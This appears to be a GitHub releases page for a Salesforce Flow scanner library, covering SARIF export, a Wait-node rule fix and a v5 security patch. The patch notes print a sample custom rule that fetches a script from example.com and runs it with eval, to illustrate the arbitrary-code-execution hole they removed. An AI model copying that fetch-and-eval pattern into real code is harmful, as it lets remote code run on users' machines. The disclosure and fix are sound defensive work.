Releases: Flow-Scanner/lightning-flow-scanner-core
Cross-OS compatible build scripts
This release makes the build scripts fully cross-OS compatible (Windows/macOS/Linux):
- Replaced the broken `rifraf` reference with `rimraf` (the industry standard)
- Updated scripts to use pure Node.js based copying
`npm run build` now works on:
- Windows PowerShell
- GitHub Actions
- macOS
- Linux
- Azure/CircleCI/etc.
Export Results as SARIF
```typescript
exportSarif(results: ScanResult[]): string
```
Generates SARIF output with real file paths and exact line numbers, powered by mapRegion() scanning the raw XML returned by flow.toXMLString().
Supports both local files and the browser: by leveraging Flow.toXMLString() the line numbers are accurate without needing any files on disk.
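To illustrate the idea behind that line mapping, here is an added example that is not the project's mapRegion() or exportSarif(): it scans the raw Flow XML text for the line where a flagged element starts and places that region in a minimal SARIF 2.1.0 result. Looking elements up by their `<name>` child, assuming `<name>` is the first child of an element, and the sample flow and findings are all assumptions made for this example.

```typescript
// Added example, not the project's own mapRegion()/exportSarif(). It locates a flow element
// in the raw XML by its <name> child (assumed to be the element's first child, as the
// Metadata API serializes it) and emits a minimal SARIF 2.1.0 log with a physicalLocation.

interface Region { startLine: number; startColumn: number; }

interface Finding { ruleId: string; message: string; elementName: string; }

// Return the 1-based line/column of the opening tag of the element whose <name> equals
// `elementName`, or null when no element carries that name.
function mapRegion(xml: string, elementName: string): Region | null {
  const lines = xml.split(/\r?\n/);
  const needle = `<name>${elementName}</name>`;
  const nameLine = lines.findIndex((line) => line.includes(needle));
  if (nameLine === -1) return null;
  // Walk upward to the nearest line that consists only of an opening tag: the enclosing element.
  for (let j = nameLine - 1; j >= 0; j--) {
    const m = /^(\s*)<[A-Za-z]+>\s*$/.exec(lines[j] ?? "");
    if (m) return { startLine: j + 1, startColumn: (m[1] ?? "").length + 1 };
  }
  // Fallback: point at the <name> line itself.
  return { startLine: nameLine + 1, startColumn: (lines[nameLine] ?? "").indexOf(needle) + 1 };
}

// Build a SARIF log for one flow file; `uri` is the path recorded as the artifact location.
function buildSarif(uri: string, xml: string, findings: Finding[]): string {
  const results = findings.map((f) => ({
    ruleId: f.ruleId,
    level: "warning",
    message: { text: f.message },
    locations: [{
      physicalLocation: {
        artifactLocation: { uri },
        region: mapRegion(xml, f.elementName) ?? { startLine: 1, startColumn: 1 },
      },
    }],
  }));
  const ruleIds = Array.from(new Set(findings.map((f) => f.ruleId)));
  const log = {
    $schema: "https://json.schemastore.org/sarif-2.1.0.json",
    version: "2.1.0",
    runs: [{
      tool: { driver: { name: "example-flow-scanner", rules: ruleIds.map((id) => ({ id })) } },
      results,
    }],
  };
  return JSON.stringify(log, null, 2);
}

// Constructed sample: a tiny Flow metadata file with one record lookup and no fault path.
const SAMPLE_FLOW_XML = `<?xml version="1.0" encoding="UTF-8"?>
<Flow xmlns="http://soap.sforce.com/2006/04/metadata">
    <apiVersion>60.0</apiVersion>
    <recordLookups>
        <name>Get_Account</name>
        <label>Get Account</label>
        <object>Account</object>
    </recordLookups>
    <status>Active</status>
</Flow>
`;

// Constructed finding referring to the element above.
const SAMPLE_FINDINGS: Finding[] = [
  { ruleId: "MissingFaultPath", message: "Get_Account has no fault path.", elementName: "Get_Account" },
];

console.log(buildSarif("flows/Sample.flow-meta.xml", SAMPLE_FLOW_XML, SAMPLE_FINDINGS));
```

Because the region is derived from the XML string rather than from a file handle, the same function works for files read from disk and for flows serialized in the browser, which is the property the release notes describe.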
Example
```typescript
// Get SARIF output and write it to disk
import { writeFileSync } from "node:fs";
import { parse, scan, exportSarif } from "@flow-scanner/lightning-flow-scanner-core";

parse("flows/*.xml")
  .then(scan)
  .then(exportSarif)
  .then((sarif) => writeFileSync("results.sarif", sarif));
```
v6: Trusted publishing, fast-xml-parser, and Beta mode
Key Changes
- Scoped Trusted Publishing: Migrated to @Flow-Scanner npm org with Trusted Publishing (OIDC via GitHub Actions) for Zero Trust security—no long-lived tokens, automated scans/tests, and provenance attestations to mitigate supply chain risks.
- Dependency Upgrade: Replaced xmlbuilder2 with fast-xml-parser for a more active ecosystem, reduced package size (~20% smaller footprint), and potential parsing performance gains in Flow metadata handling.
- New Config Option: Added betaMode parameter to enable experimental beta rules during scans, allowing users to opt-in for rules in development.
- Sets default severity as warning
Upgrade Guide
To update your dependencies run npm i @flow-scanner/[email protected]
Thanks for using Lightning Flow Scanner Core!
MissingFaultPath bug fix for Wait nodes
v5.9 — Fix MissingFaultPath rule for Wait nodes
This release fixes issue #272, contributed by @chazwatkins, where the MissingFaultPath rule incorrectly flagged all "Wait" nodes.
The bug was caused because the rule did not distinguish between different Wait subtypes. In Salesforce flows, only "Wait For Conditions" nodes can have fault paths. "Wait for Amount of Time" (WaitDuration) and "Wait Until Date" (WaitDate) nodes cannot have fault paths. This fix updates the MissingFaultPath rule to properly ignore WaitDuration and WaitDate subtypes, while continuing to check for applicable cases.
Salesforce Wait Nodes Overview
1. Wait for Conditions
- Lets a flow pause until certain conditions are true.
- This is essentially an event-based pause and can have error handling logic attached — so a fault path is valid here.
- For more details, refer to the Salesforce documentation on Wait for Conditions.
2. Wait for Amount of Time (WaitDuration)
- Pauses flow for a fixed amount of time.
- This is purely time-based with no real failure conditions that Salesforce would allow fault handling for.
- Therefore, no fault path option is provided.
- For more information, see the Salesforce documentation on Wait for Amount of Time.
3. Wait Until Date (WaitDate)
- Pauses flow until a given date/time.
- Also purely time-based → no fault path.
- For further details, check the Salesforce documentation on Wait Until Date.
Changes
- Added `isValidSubtype` method to properly handle applicable element subtypes.
- Updated MissingFaultPath rule execution logic.
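As an added example of the subtype distinction this fix introduces (not the project's own rule code), the following minimal MissingFaultPath-style check only reports a Wait element when it is a "Wait for Conditions" node and skips WaitDuration and WaitDate. The element shape, the `subtype` field, the list of fault-capable element types and the sample flow are assumptions made for this illustration.

```typescript
// Added example, not the project's own MissingFaultPath implementation. Field names
// (type, subtype, faultConnector) and the fault-capable type list are assumptions.

type WaitSubtype = "WaitConditions" | "WaitDuration" | "WaitDate";

interface FlowElement {
  name: string;
  type: string;               // metadata element type, e.g. "recordLookups", "actionCalls", "waits"
  subtype?: WaitSubtype;      // assumed field carrying the Wait subtype when type === "waits"
  faultConnector?: { targetReference: string };
}

// Element types to which a fault connector can be attached (assumed list for the example).
const FAULT_CAPABLE_TYPES = new Set([
  "recordLookups", "recordCreates", "recordUpdates", "recordDeletes",
  "actionCalls", "apexPluginCalls", "waits",
]);

// A Wait element is eligible for the check only when it is a Wait-for-Conditions node;
// WaitDuration and WaitDate cannot have fault paths, so they are ignored. Non-Wait
// elements are always eligible.
function isValidSubtype(el: FlowElement): boolean {
  if (el.type !== "waits") return true;
  return el.subtype === undefined || el.subtype === "WaitConditions";
}

// Names of elements that could have a fault path but define none.
function missingFaultPath(elements: FlowElement[]): string[] {
  return elements
    .filter((el) => FAULT_CAPABLE_TYPES.has(el.type))
    .filter(isValidSubtype)
    .filter((el) => el.faultConnector === undefined)
    .map((el) => el.name);
}

// Constructed sample flow: one handled lookup, one unhandled lookup, the three Wait
// variants (none with a fault connector) and an assignment that never needs one.
const SAMPLE_ELEMENTS: FlowElement[] = [
  { name: "Get_Account", type: "recordLookups", faultConnector: { targetReference: "Handle_Error" } },
  { name: "Get_Contact", type: "recordLookups" },
  { name: "Wait_For_Approval", type: "waits", subtype: "WaitConditions" },
  { name: "Wait_One_Hour", type: "waits", subtype: "WaitDuration" },
  { name: "Wait_Until_Renewal", type: "waits", subtype: "WaitDate" },
  { name: "Set_Status", type: "assignments" },
];

console.log(missingFaultPath(SAMPLE_ELEMENTS)); // ["Get_Contact", "Wait_For_Approval"]
```

Before the fix the two time-based waits would also have appeared in the output; with the subtype filter only the lookup and the conditions-based wait are reported.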
Security Patch
🚨 v5 – Security Patch
This release delivers security improvements and we have removed custom rules.
🔒 Security Fixes
- Removed custom rule loader
- Previous versions allowed configuration files to load JavaScript from external sources.
- This created an arbitrary code execution (ACE) risk, where a malicious config could execute arbitrary code:
```typescript
execute(flow: Flow, ruleOptions?: {}): RuleResult {
  fetch("https://example.com/script.js")
    .then(res => res.text())
    .then(code => {
      eval(code); // 🚨 ACE happens here
    });
  return null;
}
```
- In v5, this behavior has been completely removed. Only built-in rules are now supported.
- Removed dynamic paths in configuration
- Config files can no longer point to external scripts or resources.
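As an added illustration of the kind of configuration check that closes this gap (not the project's own code), the validator below accepts only built-in rule names and rejects any config value that points at a script, module or URL. The two rule names come from this page; the config shape (`rules`, `betaMode`), the option keys and the sample configs are assumptions made for this example.

```typescript
// Added example, not the project's own config loader. Only built-in rule names are
// accepted, unknown top-level keys are rejected, and no string anywhere in the config
// may reference a URL, path or JS/TS module. Config shape and option keys are assumptions.

const BUILT_IN_RULES = new Set(["MissingFaultPath", "MissingNullHandler"]);
const ALLOWED_TOP_LEVEL_KEYS = new Set(["rules", "betaMode"]);

interface ValidationResult { ok: boolean; errors: string[]; }

// Collect every string nested anywhere inside a config value.
function collectStrings(value: unknown, out: string[] = []): string[] {
  if (typeof value === "string") out.push(value);
  else if (Array.isArray(value)) value.forEach((v) => collectStrings(v, out));
  else if (value !== null && typeof value === "object") Object.values(value).forEach((v) => collectStrings(v, out));
  return out;
}

// True for strings that name a URL, a filesystem path or a JavaScript/TypeScript module.
function looksLikeExternalReference(s: string): boolean {
  return /^(https?|file|data):/i.test(s) || /[\\/]/.test(s) || /\.(c|m)?[jt]s$/i.test(s);
}

function validateConfig(config: unknown): ValidationResult {
  const errors: string[] = [];
  if (config === null || typeof config !== "object" || Array.isArray(config)) {
    return { ok: false, errors: ["config must be a plain object"] };
  }
  const cfg = config as Record<string, unknown>;
  for (const key of Object.keys(cfg)) {
    if (!ALLOWED_TOP_LEVEL_KEYS.has(key)) errors.push(`unknown top-level key "${key}"`);
  }
  if ("betaMode" in cfg && typeof cfg.betaMode !== "boolean") errors.push("betaMode must be a boolean");
  const rules = cfg.rules;
  if (rules !== undefined) {
    if (rules === null || typeof rules !== "object" || Array.isArray(rules)) {
      errors.push("rules must be an object keyed by rule name");
    } else {
      for (const [ruleName, options] of Object.entries(rules as Record<string, unknown>)) {
        if (!BUILT_IN_RULES.has(ruleName)) errors.push(`unknown rule "${ruleName}" (only built-in rules are supported)`);
        for (const s of collectStrings(options)) {
          if (looksLikeExternalReference(s)) errors.push(`rule "${ruleName}": external reference "${s}" is not allowed`);
        }
      }
    }
  }
  return { ok: errors.length === 0, errors };
}

// Constructed weak config: a rule entry pointing at a remote script, as the old loader accepted.
const WEAK_CONFIG = {
  rules: {
    MissingFaultPath: { severity: "error" },
    MyCustomRule: { path: "https://example.com/script.js" },
  },
};

// Constructed safe config: built-in rules only, plus the betaMode opt-in.
const SAFE_CONFIG = {
  rules: { MissingFaultPath: { severity: "error" }, MissingNullHandler: {} },
  betaMode: true,
};

console.log(validateConfig(WEAK_CONFIG)); // { ok: false, errors: [unknown rule, external reference] }
console.log(validateConfig(SAFE_CONFIG)); // { ok: true, errors: [] }
```

Rejecting the config up front, before any rule is instantiated, is what removes the eval-from-config path: a name that is not in the built-in set never reaches a loader, and a URL or path in an option value is reported rather than fetched.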
🛡 Dependency & Audit Updates
- All dependencies updated to their latest secure versions.
- Applied `npm audit fix` to patch known vulnerabilities.
📌 Impact
- Custom rules functionality has been retired.
- All packages that relied on the custom rule loader have been unpublished.
Note on Forks:
Using a fork? Check node_modules/ for RuleLoader.ts or RuleLoader.js. If present, it’s vulnerable.
For patched versions, see https://github.com/Flow-Scanner
4.50.0
4.49.0
What's Changed
- MissingNullHandler triggered on subflow output variables #67 by @RubenHalman in #241
- Replace table with referable headers by @RubenHalman in #248
Full Changelog: v4.48.0...v4.49.0
4.48.0
Full Changelog: v4.47.0...v4.48.0
4.47.0
What's Changed
- Update issue templates by @RubenHalman in #238
- script:deploy test flows by @RubenHalman in #239
- small fixes for Missing Null Handler
Full Changelog: v4.46.0...v4.47.0